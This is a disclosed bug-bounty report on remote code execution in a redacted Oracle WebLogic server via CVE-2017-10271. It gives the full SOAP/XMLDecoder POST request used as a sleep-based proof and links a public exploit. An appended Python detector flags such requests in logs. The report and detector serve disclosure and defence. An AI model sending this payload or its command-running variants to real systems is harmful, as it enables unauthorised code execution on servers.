RCE on █████ via CVE-2017-10271
Discovered by erbbysam on Deptofdefense

This issue took 3 days and 18 hours to triage and 22 days and 0 hours to resolve once triaged.



Summary: Happy Friday! The server at ██████ is vulnerable to CVE-2017-10271 "Oracle WebLogic Server Remote Command Execution".

Description: The following request takes 12 seconds (12000 milliseconds) to complete:

POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: ██████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java class="java.beans.XMLDecoder">
        <object class="java.lang.Thread" method="sleep">
          <long>12000</long>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

This proves that I have Java code execution on the remote server.

ref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/

Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271

I was not able to use that script with a ping command, which might have been blocked by preventing outbound connections.

Suggested Mitigation/Remediation Actions

Patch & possibly don't allow external access.

Impact

Critical, RCE.
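
Added example, not part of the original report: a defender-side check that flags HTTP requests shaped like the one above, namely a POST to a /wls-wsat/ path whose SOAP WorkContext header carries XMLDecoder elements. The function name, the finding strings and the sample body are constructed for illustration; it assumes the request method, path and body are already available from a proxy or WAF log.

```python
import xml.etree.ElementTree as ET

WSAT_PREFIX = "/wls-wsat/"  # endpoint path prefix taken from the report's request
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"  # namespace from the report
DECODER_TAGS = {"java", "object"}  # XMLDecoder elements present in the report

# Constructed sample body mirroring the request in the report.
SAMPLE_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java class="java.beans.XMLDecoder">
        <object class="java.lang.Thread" method="sleep"><long>12000</long></object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

def inspect_request(method, path, body):
    """Return a list of findings for one HTTP request; an empty list means clean."""
    findings = []
    if method.upper() != "POST" or not path.lower().startswith(WSAT_PREFIX):
        return findings
    findings.append("request to wls-wsat endpoint")
    # Refuse to parse bodies that declare a DTD, to avoid entity-expansion issues.
    if "<!DOCTYPE" in body.upper():
        findings.append("DOCTYPE present, body not parsed")
        return findings
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        findings.append("malformed XML body")
        return findings
    # Walk every element nested inside a WorkContext header.
    for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS):
        for el in ctx.iter():
            local = el.tag.rsplit("}", 1)[-1]  # strip any namespace prefix
            if local in DECODER_TAGS:
                findings.append("XMLDecoder element <%s class=%r> in WorkContext"
                                % (local, el.get("class", "")))
    return findings

if __name__ == "__main__":
    for finding in inspect_request("POST", "/wls-wsat/RegistrationPortTypeRPC", SAMPLE_BODY):
        print(finding)
```

Any hit on the first finding alone is worth reviewing when the wls-wsat component is not meant to be reachable from outside.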